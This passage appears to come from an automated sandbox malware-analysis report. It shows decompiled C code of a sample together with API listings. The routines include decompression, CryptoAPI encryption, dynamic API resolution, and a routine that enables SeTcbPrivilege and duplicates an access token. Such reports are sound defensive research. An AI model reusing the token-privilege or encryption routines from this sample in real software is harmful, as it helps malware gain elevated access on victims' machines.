    																			__eflags = _t1168 - 0xb;
    																			if(_t1168 <= 0xb) {
    																				L171:
    																				_t1030 = (_t1027 >> 0x00000001 & 0x00000001) - _t1316;
    																				__eflags = _t1030;
    																				 *((short*)(_t1368 + 0x91e + _t1030 * 2)) = _v52;
    																				L172:
    																				_t1091 = _v32;
    																				goto L173;
    																			} else {
    																				_t1108 = _t1168 - 0xb;
    																				do {
    																					_t1027 = _t1027 >> 1;
    																					_t1175 = _t1368 + (0x48f - _t1316 - (_t1027 & 0x00000001)) * 2;
    																					_t1318 =  *0x48f & 0x0000ffff;
    																					__eflags = _t1318;
    																					if(_t1318 != 0) {
    																						_t1316 = _t1318;
    																					} else {
    																						_t1316 = _v20;
    																						_v20 = _v20 - 2;
    																						 *_t1175 = _t1316;
    																					}
    																					_t1108 = _t1108 - 1;
    																					__eflags = _t1108;
    																				} while (_t1108 != 0);
    																				goto L171;
    																			}
    																		}
    																		_v44 = (_t1168 << 0x00000009 | _v52) & 0x0000ffff;
    																		__eflags = _t1025 - 0x400;
    																		if(_t1025 >= 0x400) {
    																			goto L172;
    																		}
    																		__eflags = 1;
    																		_t250 = _t1025 * 2; // 0x160
    																		_t1176 = _t1368 + _t250 + 0x120;
    																		do {
    																			_t1025 = _t1025 + 1;
    																			 *_t1176 = _v44;
    																			_t1176 = _t1176 + 2;
    																			__eflags = _t1025 - 0x400;
    																		} while (_t1025 < 0x400);
    																		goto L172;
    																	} else {
    																		goto L150;
    																	}
    																	do {
    																		L150:
    																		_v44 = _v44 >> 1;
    																		_t1025 = _t1025 + _t1025 | _v44 & 0x00000001;
    																		_t1313 = _t1313 - 1;
    																		__eflags = _t1313;
    																	} while (_t1313 != 0);
    																	goto L151;
    																	L173:
    																	_v52 = _v52 + 1;
    																	_t1026 = _t1381[6];
    																	__eflags = _v52 -  *((intOrPtr*)(_t1381 + 0x2c + _t1026 * 4));
    																} while (_v52 <  *((intOrPtr*)(_t1381 + 0x2c + _t1026 * 4)));
    																goto L174;
    															}
    															__eflags = _t1104 - 1;
    															if(_t1104 > 1) {
    																_t1091 = _v32;
    																L353:
    																 *_t1381 = 0x23;
    																goto L395;
    															}
    															goto L147;
    														}
    														_t1299 =  *(_t1381 + 0x2c + _t1381[6] * 4);
    														do {
    															 *((intOrPtr*)(_t1382 + ( *(_t1150 + _t1368) & 0x000000ff) * 4 - 0xbc)) =  *((intOrPtr*)(_t1382 + ( *(_t1150 + _t1368) & 0x000000ff) * 4 - 0xbc)) + 1;
    															_t1150 = _t1150 + 1;
    															__eflags = _t1150 - _t1299;
    														} while (_t1150 < _t1299);
    														goto L143;
    													}
    													_t172 = _t1347 + 0x3e6640; // 0x2000405
    													_t1177 =  *_t172;
    													__eflags = _t1091 - _t1177;
    													if(_t1091 >= _t1177) {
    														L135:
    														 *(_t1381 + 0x2c + _t1347 * 4) = (1 << _t1177) - 0x00000001 & _v12;
    														_t189 = _t1347 + 0x3e6640; // 0x40505
    														_t1178 =  *_t189;
    														_v12 = _v12 >> _t1178;
    														 *(_t1381 + 0x2c + _t1347 * 4) =  *(_t1381 + 0x2c + _t1347 * 4) +  *((intOrPtr*)(0x3e6634 + _t1347 * 4));
    														_t1091 = _t1091 - _t1178;
    														_v32 = _t1091;
    														_t1347 = _t1347 + 1;
    														goto L127;
    													}
    													L129:
    													__eflags = _v8 - _v24;
    													if(_v8 < _v24) {
    														_t1043 =  *_v8 & 0x000000ff;
    														_t179 =  &_v8;
    														 *_t179 = _v8 + 1;
    														__eflags =  *_t179;
    														L133:
    														_t1044 = _t1043 << _t1091;
    														_t1091 = _t1091 + 8;
    														_v12 = _v12 | _t1044;
    														_t1045 = _v16;
    														_t184 = _t1045 + 0x3e6640; // 0x40505
    														_t1177 =  *_t184;
    														__eflags = _t1091 - _t1177;
    														if(_t1091 < _t1177) {
    															goto L129;
    														}
    														_t1347 = _t1045;
    														goto L135;
    													}
    													L130:
    													__eflags = _a24 & 0x00000002;
    													if((_a24 & 0x00000002) != 0) {
    														_v20 = 1;
    														 *_t1381 = 0xb;
    														goto L396;
    													}
    													_t1043 = 0;
    													goto L133;
    												}
    												_t1180 = 8;
    												_t1112 =  &(_t1381[0x10]);
    												_t1381[0xb] = 0x120;
    												_t1381[0xc] = 0x20;
    												memset( &(_t1381[0x378]), 0x5050505, _t1180 << 2);
    												memset(_t1112, 8, 0x90);
    												_t1113 = _t1112 + 0x90;
    												memset(_t1113, 9, 0x70);
    												_t1182 = 6;
    												memset(_t1113 + 0x70, 0x7070707, _t1182 << 2);
    												_t1383 = _t1383 + 0x30;
    												_t1091 = _v32;
    												asm("stosd");
    												asm("stosd");
    												goto L139;
    											}
    											__eflags = _a24 & 0x00000001;
    											if((_a24 & 0x00000001) == 0) {
    												goto L392;
    											}
    											_t1336 = _v24;
    											L369:
    											__eflags = _t1091 - (_t1091 & 0x00000007);
    											if(_t1091 < (_t1091 & 0x00000007)) {
    												__eflags = _v8 - _t1336;
    												if(_v8 < _t1336) {
    													_t875 =  *_v8 & 0x000000ff;
    													_t696 =  &_v8;
    													 *_t696 = _v8 + 1;
    													__eflags =  *_t696;
    													L368:
    													_v12 = _v12 | _t875 << _t1091;
    													_t1091 = _t1091 + 8;
    													__eflags = _t1091;
    													goto L369;
    												}
    												L365:
    												__eflags = _a24 & 0x00000002;
    												if((_a24 & 0x00000002) != 0) {
    													_v20 = 1;
    													 *_t1381 = 0x20;
    													goto L396;
    												}
    												_t875 = 0;
    												goto L368;
    											}
    											_t1186 = _t1091 & 0x00000007;
    											_v12 = _v12 >> _t1186;
    											_t1091 = _t1091 - _t1186;
    											_v16 = _v16 & 0x00000000;
    											goto L384;
    										}
    										__eflags = _t1091;
    										if(_t1091 != 0) {
    											goto L95;
    										}
    										L103:
    										__eflags = _v16;
    										if(_v16 == 0) {
    											goto L113;
    										}
    										L104:
    										__eflags = _v28 - _v48;
    										if(_v28 >= _v48) {
    											_v20 = 2;
    											 *_t1381 = 9;
    											goto L396;
    										}
    										L105:
    										__eflags = _v8 - _t1336;
    										if(_v8 >= _t1336) {
    											__eflags = _a24 & 0x00000002;
    											if((_a24 & 0x00000002) == 0) {
    												goto L393;
    											}
    											_v20 = 1;
    											 *_t1381 = 0x26;
    											goto L396;
    										}
    										_t880 = _v48 - _v28;
    										_t1379 = _t1336 - _v8;
    										_t1222 = _t880;
    										__eflags = _t880 - _t1379;
    										if(_t880 >= _t1379) {
    											_t1222 = _t1379;
    										}
    										__eflags = _t1222 - _v16;
    										if(_t1222 >= _v16) {
    											_t1379 = _v16;
    										} else {
    											__eflags = _t880 - _t1379;
    											if(_t880 < _t1379) {
    												_t1379 = _t880;
    											}
    										}
    										memcpy(_v28, _v8, _t1379);
    										_v8 = _v8 + _t1379;
    										_v28 = _v28 + _t1379;
    										_t1383 = _t1383 + 0xc;
    										_v16 = _v16 - _t1379;
    										_t1336 = _v24;
    										goto L103;
    									}
    									__eflags = _v8 - _t1336;
    									if(_v8 >= _t1336) {
    										goto L92;
    									}
    									_t852 =  *_v8 & 0x000000ff;
    									_v8 = _v8 + 1;
    									goto L94;
    								}
    								_t852 =  *_t1243 & 0x000000ff;
    								_v8 =  &(_t1243[1]);
    								goto L94;
    							}
    							_t1053 = _t851 - 1;
    							__eflags = _t1053;
    							if(_t1053 == 0) {
    								goto L99;
    							}
    							__eflags = _t1053 == 1;
    							if(_t1053 == 1) {
    								goto L301;
    							}
    							goto L396;
    						}
    						if(__eflags == 0) {
    							goto L105;
    						}
    						__eflags = _t821 - 0x22;
    						if(__eflags > 0) {
    							_t1055 = _t821 - 0x23;
    							__eflags = _t1055;
    							if(_t1055 == 0) {
    								goto L353;
    							}
    							_t1056 = _t1055 - 1;
    							__eflags = _t1056;
    							if(_t1056 == 0) {
    								L36:
    								 *_t1381 = 0x24;
    								goto L395;
    							}
    							__eflags = _t1056 != 1;
    							if(_t1056 != 1) {
    								goto L396;
    							}
    							goto L81;
    						}
    						if(__eflags == 0) {
    							goto L392;
    						}
    						_t1058 = _t821 - 0x19;
    						__eflags = _t1058;
    						if(_t1058 == 0) {
    							__eflags = _t1243 - _t1336;
    							if(_t1243 >= _t1336) {
    								goto L260;
    							}
    							_t951 =  *_t1243 & 0x000000ff;
    							_v8 =  &(_t1243[1]);
    							goto L263;
    						}
    						_t1059 = _t1058 - 1;
    						__eflags = _t1059;
    						if(_t1059 == 0) {
    							__eflags = _t1243 - _t1336;
    							if(_t1243 >= _t1336) {
    								goto L276;
    							}
    							_t940 =  *_t1243 & 0x000000ff;
    							_v8 =  &(_t1243[1]);
    							goto L279;
    						}
    						_t1060 = _t1059 - 1;
    						__eflags = _t1060;
    						if(_t1060 == 0) {
    							__eflags = _t1243 - _t1336;
    							if(_t1243 >= _t1336) {
    								goto L289;
    							}
    							_t926 =  *_t1243 & 0x000000ff;
    							_v8 =  &(_t1243[1]);
    							goto L292;
    						}
    						__eflags = _t1060 != 5;
    						if(_t1060 != 5) {
    							goto L396;
    						}
    						__eflags = _t1243 - _t1336;
    						if(_t1243 >= _t1336) {
    							goto L365;
    						}
    						_t875 =  *_t1243 & 0x000000ff;
    						_v8 =  &(_t1243[1]);
    						goto L368;
    					}
    					if(_t1389 == 0) {
    						goto L253;
    					}
    					_t1390 = _t821 - 0xa;
    					if(_t1390 > 0) {
    						_t1062 = _t821 - 0xb;
    						__eflags = _t1062;
    						if(_t1062 == 0) {
    							_t1226 = _t1243;
    							__eflags = _t1226 - _t1336;
    							if(_t1226 >= _t1336) {
    								goto L130;
    							}
    							_t1043 =  *_t1226 & 0x000000ff;
    							_v8 =  &(_t1226[1]);
    							goto L133;
    						}
    						_t1063 = _t1062 - 3;
    						__eflags = _t1063;
    						if(_t1063 == 0) {
    							_t1228 = _t1243;
    							__eflags = _t1228 - _t1336;
    							if(_t1228 >= _t1336) {
    								goto L157;
    							}
    							_t896 =  *_t1228 & 0x000000ff;
    							_v8 =  &(_t1228[1]);
    							goto L160;
    						}
    						_t1065 = _t1063;
    						__eflags = _t1065;
    						if(_t1065 == 0) {
    							_t1230 = _t1243;
    							__eflags = _t1230 - _t1336;
    							if(_t1230 >= _t1336) {
    								goto L187;
    							}
    							_t1021 =  *_t1230 & 0x000000ff;
    							_v8 =  &(_t1230[1]);
    							goto L190;
    						}
    						_t1066 = _t1065 - 1;
    						__eflags = _t1066;
    						if(_t1066 == 0) {
    							goto L355;
    						}
    						_t1067 = _t1066 - 1;
    						__eflags = _t1067;
    						if(_t1067 == 0) {
    							_t1232 = _t1243;
    							__eflags = _t1232 - _t1336;
    							if(_t1232 >= _t1336) {
    								goto L203;
    							}
    							_t1012 =  *_t1232 & 0x000000ff;
    							_v8 =  &(_t1232[1]);
    							goto L206;
    						}
    						_t1068 = _t1067 - 3;
    						__eflags = _t1068;
    						if(_t1068 == 0) {
    							goto L357;
    						}
    						__eflags = _t1068 != 0;
    						if(_t1068 != 0) {
    							goto L396;
    						}
    						_t1234 = _t1243;
    						__eflags = _t1234 - _t1336;
    						if(_t1234 >= _t1336) {
    							goto L242;
    						}
    						_t962 =  *_t1234 & 0x000000ff;
    						_v8 =  &(_t1234[1]);
    						goto L245;
    					}
    					if(_t1390 == 0) {
    						goto L349;
    					}
    					if(_t821 > 9) {
    						goto L396;
    					}
    					switch( *((intOrPtr*)(_t821 * 4 +  &M003D390B))) {
    						case 0:
    							_t1091 = 0;
    							_t1381[3] = 0;
    							_t1381[2] = 0;
    							_v36 = 0;
    							_v16 = 0;
    							_v40 = 0;
    							_v32 = 0;
    							_v12 = 0;
    							_t1381[7] = 1;
    							_t1381[4] = 1;
    							if((_a24 & 1) == 0) {
    								goto L121;
    							}
    							goto L12;
    						case 1:
    							L12:
    							_t1073 = _t1243;
    							if(_t1073 >= _t1336) {
    								__eflags = _a24 & 0x00000002;
    								if((_a24 & 0x00000002) == 0) {
    									_t54 =  &(_t1381[2]);
    									 *_t54 = _t1381[2] & 0x00000000;
    									__eflags =  *_t54;
    									goto L17;
    								}
    								_v20 = 1;
    								 *_t1381 = 1;
    								goto L396;
    							} else {
    								_t1381[2] =  *_t1073 & 0x000000ff;
    								_v8 =  &(_t1073[1]);
    								L17:
    								_t1074 = _v8;
    								if(_t1074 >= _t1336) {
    									goto L21;
    								}
    								_v8 = _v8 + 1;
    								_t1381[3] =  *_t1074 & 0x000000ff;
    								goto L24;
    							}
    						case 2:
    							__eax = __edx;
    							__eflags = __eax - __edi;
    							if(__eax >= __edi) {
    								L21:
    								__eflags = _a24 & 0x00000002;
    								if((_a24 & 0x00000002) == 0) {
    									_t66 =  &(_t1381[3]);
    									 *_t66 = _t1381[3] & 0x00000000;
    									__eflags =  *_t66;
    									L24:
    									_t1380 = _t1381[2];
    									_t1236 = _t1381[3];
    									_push(0x1f);
    									_pop(_t1114);
    									_t1334 = ((_t1380 << 8) + _t1236) % _t1114;
    									if(_t1334 != 0 || (_t1236 & 0x00000020) != 0 || (_t1380 & 0x0000000f) != 8) {
    										_v16 = 1;
    									} else {
    										_v16 = _v16 & _t1334;
    									}
    									if(_v44 == 0) {
    										_t1081 = 1 << (_t1380 >> 4) + 8;
    										if(1 > 0x8000 || _v60 + 1 < _t1081) {
    											_t1083 = 1;
    											__eflags = 1;
    										} else {
    											_t1083 = 0;
    										}
    										_v16 = _v16 | _t1083;
    									}
    									_t1091 = _v32;
    									if(_v16 == 0) {
    										goto L121;
    									} else {
    										goto L36;
    									}
    								}
    								_v20 = 1;
    								 *_t1381 = 2;
    								goto L396;
    							}
    							__ecx =  *__eax & 0x000000ff;
    							__eax = __eax + 1;
    							 *(__esi + 0xc) = __ecx;
    							_v8 = __eax;
    							goto L24;
    						case 3:
    							__ecx = __edx;
    							__eflags = __ecx - __edi;
    							if(__ecx >= __edi) {
    								goto L117;
    							}
    							__eax =  *__ecx & 0x000000ff;
    							_v8 = __ecx;
    							goto L120;
    						case 4:
    							goto L396;
    						case 5:
    							__ecx = __edx;
    							__eflags = __ecx - __edi;
    							if(__ecx >= __edi) {
    								goto L318;
    							}
    							__eax =  *__ecx & 0x000000ff;
    							_v8 = __ecx;
    							goto L321;
    						case 6:
    							__ecx = __edx;
    							__eflags = __ecx - __edi;
    							if(__ecx >= __edi) {
    								goto L330;
    							}
    							__eax =  *__ecx & 0x000000ff;
    							_v8 = __ecx;
    							goto L333;
    						case 7:
    							__eax = __edx;
    							__eflags = __eax - __edi;
    							if(__eax >= __edi) {
    								goto L327;
    							}
    							__cl =  *__eax;
    							__edx = _v16;
    							__eax = __eax + 1;
    							 *((char*)(_v16 + __esi + 0x2920)) = __cl;
    							_v8 = __eax;
    							goto L337;
    						case 8:
    							goto L104;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
    • CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
    • CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
    • CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 53%
    			E003CF990(intOrPtr* _a4) {
    				_Unknown_base(*)()* _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v40;
    				char _v44;
    				char _v60;
    				char _v160;
    				intOrPtr _t53;
    				intOrPtr* _t57;
    				intOrPtr* _t58;
    				_Unknown_base(*)()* _t59;
    				intOrPtr _t68;
    				intOrPtr _t70;
    				signed int _t74;
    				intOrPtr* _t75;
    				intOrPtr _t99;
    				intOrPtr* _t104;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				intOrPtr _t120;
    				intOrPtr _t121;
    				intOrPtr _t123;
    				intOrPtr _t124;
    				intOrPtr _t128;
    				signed int _t130;
    				signed int _t131;
    				struct HINSTANCE__* _t132;
    				_Unknown_base(*)()* _t139;
    
    				_v16 = 0;
    				_v12 = 0xffffffff;
    				_v20 = 0;
    				_v24 = 0;
    				_v8 = 0;
    				_t139 =  *0x3e85c8; // 0x0
    				if(_t139 != 0) {
    					L3:
    					_t53 =  *0x3e8628; // 0x622508
    					_v28 = 0;
    					_t20 = _t53 + 0x150; // 0x622658
    					_t130 = _t20;
    					_push( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x100))))(0x28,  &_v8));
    					if( *((intOrPtr*)( *_t130))() != 0) {
    						_t121 =  *0x3e8628; // 0x622508
    						_push( &_v40);
    						_push(L"SeTcbPrivilege");
    						_push(0);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x188))))() != 0) {
    							_t123 =  *0x3e8628; // 0x622508
    							_v44 = 1;
    							_v32 = 2;
    							 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18c))))(_v8, 0,  &_v44, 0x10,  &_v60,  &_v28);
    						}
    					}
    					_t57 =  *0x3e85dc; // 0x0
    					_t131 = _t130 | 0xffffffff;
    					if(_t57 == 0) {
    						L17:
    						_t58 =  *0x3e85fc; // 0x0
    						if(_t58 == 0) {
    							L22:
    							_t59 = _v8;
    							if(_t59 == 0) {
    								L24:
    								return _t59;
    							}
    							_t113 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x18c))))(_t59, 0,  &_v60, 0x10, 0, 0);
    							_t114 =  *0x3e8628; // 0x622508
    							return  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xf8))))(_v8);
    						}
    						_t131 =  *_t58();
    						if(_t131 == 0xffffffff) {
    							goto L22;
    						}
    						L19:
    						_t99 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t99 + 0x190))))();
    						_push( &_v12);
    						_push(_t131);
    						if( *0x3e85c8() != 0) {
    							_t68 =  *0x3e8628; // 0x622508
    							_push( &_v16);
    							_push(1);
    							_push(1);
    							_push(0);
    							_push(0x2000000);
    							_push(_v12);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x144))))() != 0) {
    								_t70 =  *0x3e8628; // 0x622508
    								 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xf8))))(_v12);
    								 *_a4 = _v16;
    							}
    						}
    						goto L22;
    					}
    					_t30 =  &_v24; // 0x3c4354
    					_push( &_v20);
    					_push(1);
    					_push(0);
    					_push(0);
    					if( *_t57() == 0) {
    						goto L17;
    					}
    					_t32 =  &_v24; // 0x3c4354
    					_t120 =  *_t32;
    					_t128 = _v20;
    					_t74 = 0;
    					if(_t120 <= 0) {
    						L14:
    						_t75 =  *0x3e85f8; // 0x0
    						if(_t75 != 0) {
    							 *_t75(_t128);
    						}
    						if(_t131 != 0xffffffff) {
    							goto L19;
    						} else {
    							goto L17;
    						}
    					} else {
    						_t104 = _t128 + 8;
    						while( *_t104 != 0) {
    							_t74 = _t74 + 1;
    							_t104 = _t104 + 0xc;
    							if(_t74 < _t120) {
    								continue;
    							}
    							goto L14;
    						}
    						_t131 =  *(_t128 + (_t74 + _t74 * 2) * 4);
    						goto L14;
    					}
    				}
    				E003C6CB0( &_v160, 0x97);
    				_t124 =  *0x3e8628; // 0x622508
    				_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x48))))( &_v160);
    				_t132 = _t59;
    				if(_t132 == 0) {
    					goto L24;
    				}
    				E003C6CB0( &_v160, 0x98);
    				 *0x3e85dc = GetProcAddress(_t132,  &_v160);
    				E003C6CB0( &_v160, 0x99);
    				 *0x3e85f8 = GetProcAddress(_t132,  &_v160);
    				E003C6CB0( &_v160, 0x9a);
    				 *0x3e85fc = GetProcAddress(_t132,  &_v160);
    				E003C6CB0( &_v160, 0x9b);
    				_t59 = GetProcAddress(_t132,  &_v160);
    				 *0x3e85c8 = _t59;
    				if(_t59 == 0) {
    					goto L24;
    				}
    				goto L3;
    			}




































    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA0F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA32
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA55
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA78
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003C7131() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t23;
    				signed int _t32;
    
    				_t14 =  *0x3e8100; // 0x59defe91
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t32 == 0xbb40e64e || ( *0x3e8100 & 0xffff0000) == 0) {
    						_t32 = 0xbb40e64f;
    					}
    					 *0x3e8100 = _t32;
    					 *0x3e8104 =  !_t32;
    					return _t22;
    				} else {
    					_t23 =  !_t14;
    					 *0x3e8104 = _t23;
    					return _t23;
    				}
    			}














    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003C7168
    • GetCurrentProcessId.KERNEL32 ref: 003C7174
    • GetCurrentThreadId.KERNEL32 ref: 003C717C
    • GetTickCount.KERNEL32 ref: 003C7184
    • QueryPerformanceCounter.KERNEL32(?), ref: 003C7190
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 92%
    			E003C2B83(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
    				intOrPtr _v0;
    				void* _v804;
    				intOrPtr _v808;
    				intOrPtr _v812;
    				intOrPtr _t11;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr* _t26;
    				void* _t29;
    
    				_t29 = __ecx -  *0x3e8100; // 0x59defe91
    				if(_t29 != 0) {
    					 *0x3e8760 = __eax;
    					 *0x3e875c = __ecx;
    					 *0x3e8758 = __edx;
    					 *0x3e8754 = __ebx;
    					 *0x3e8750 = __esi;
    					 *0x3e874c = __edi;
    					 *0x3e8778 = ss;
    					 *0x3e876c = cs;
    					 *0x3e8748 = ds;
    					 *0x3e8744 = es;
    					 *0x3e8740 = fs;
    					 *0x3e873c = gs;
    					asm("pushfd");
    					_pop( *0x3e8770);
    					 *0x3e8764 =  *_t26;
    					 *0x3e8768 = _v0;
    					 *0x3e8774 =  &_a4;
    					 *0x3e86b0 = 0x10001;
    					_t11 =  *0x3e8768; // 0x0
    					 *0x3e866c = _t11;
    					 *0x3e8660 = 0xc0000409;
    					 *0x3e8664 = 1;
    					_t12 =  *0x3e8100; // 0x59defe91
    					_v812 = _t12;
    					_t13 =  *0x3e8104; // 0xa621016e
    					_v808 = _t13;
    					SetUnhandledExceptionFilter(0);
    					UnhandledExceptionFilter(0x3e60b8);
    					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
    				} else {
    					return __eax;
    				}
    			}













    APIs
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003CDAC1
    • UnhandledExceptionFilter.KERNEL32(003E60B8), ref: 003CDACC
    • GetCurrentProcess.KERNEL32(C0000409), ref: 003CDAD7
    • TerminateProcess.KERNEL32(00000000), ref: 003CDADE
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 89%
    			E003DD481(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
    				signed int _v8;
    				signed int _v12;
    				void* _v16;
    				intOrPtr _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				intOrPtr* _v40;
    				signed int _v44;
    				signed int* _v48;
    				signed int _v52;
    				signed int _v56;
    				signed int _v60;
    				signed int _v64;
    				int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed int _v80;
    				signed int _v84;
    				char _v88;
    				signed int _v92;
    				signed int _v96;
    				signed int _v100;
    				signed int _v104;
    				char _v108;
    				void* _v112;
    				void* _v116;
    				intOrPtr _v120;
    				signed int _v124;
    				signed int _v128;
    				intOrPtr _v132;
    				signed int _v136;
    				char _v140;
    				intOrPtr _v144;
    				signed int _v148;
    				signed int _v152;
    				intOrPtr _v156;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char** _t331;
    				signed int _t333;
    				signed int _t335;
    				signed int _t339;
    				signed int _t343;
    				void* _t344;
    				signed int _t346;
    				signed int _t348;
    				signed int _t356;
    				signed int _t357;
    				signed int _t366;
    				signed int _t370;
    				signed int _t371;
    				signed int _t372;
    				void* _t373;
    				void* _t378;
    				signed int _t379;
    				intOrPtr* _t380;
    				intOrPtr _t383;
    				signed int _t384;
    				signed int _t385;
    				signed int _t386;
    				signed int _t393;
    				signed int _t398;
    				signed int _t399;
    				signed int _t400;
    				signed int _t401;
    				signed int _t404;
    				signed int _t406;
    				signed int _t412;
    				void* _t413;
    				signed int _t416;
    				void* _t417;
    				signed int _t421;
    				signed int _t422;
    				signed int _t427;
    				signed int _t428;
    				signed int _t429;
    				signed int* _t430;
    				signed int _t432;
    				unsigned int _t434;
    				unsigned int _t435;
    				signed int _t436;
    				signed int _t437;
    				signed int _t438;
    				intOrPtr _t440;
    				signed int _t442;
    				intOrPtr* _t443;
    				signed int _t446;
    				signed int _t448;
    				signed int _t449;
    				intOrPtr _t454;
    				signed int _t455;
    				void* _t457;
    				signed int _t458;
    				signed int _t459;
    				signed int _t465;
    				signed int _t467;
    				signed int _t473;
    				signed int _t474;
    				signed int _t475;
    				void* _t478;
    				signed int _t486;
    				intOrPtr* _t487;
    				intOrPtr _t488;
    				signed int _t492;
    				signed int _t495;
    				signed int* _t501;
    				signed int _t503;
    				intOrPtr* _t504;
    				unsigned int _t512;
    				signed int _t513;
    				intOrPtr _t514;
    				signed int _t525;
    				signed int _t544;
    				signed int _t545;
    				signed int _t546;
    				intOrPtr _t553;
    				void* _t560;
    				char _t561;
    				void* _t562;
    				signed int _t564;
    				signed int _t566;
    				signed int _t569;
    				signed int _t571;
    				void* _t572;
    				void* _t573;
    				intOrPtr _t574;
    				signed int _t577;
    				signed int _t579;
    				intOrPtr _t583;
    				signed int _t589;
    				signed int _t590;
    				intOrPtr* _t591;
    				void* _t593;
    				void* _t594;
    				signed int _t596;
    				signed int _t599;
    				signed int _t602;
    				signed int _t603;
    				void* _t608;
    				void* _t609;
    
    				_t478 = __ecx;
    				_t331 = _a16;
    				_t473 = _t331[1];
    				_v112 = 0;
    				_v116 = 0;
    				_v68 = 0;
    				_v16 = 0;
    				_v36 = _t473;
    				if(( *( *_t331) & 0x00000001) == 0) {
    					return 0;
    				}
    				_t531 = _a12;
    				_t333 = E003D6518(_a12);
    				_v8 = _t333;
    				__eflags = _t333;
    				if(_t333 == 0) {
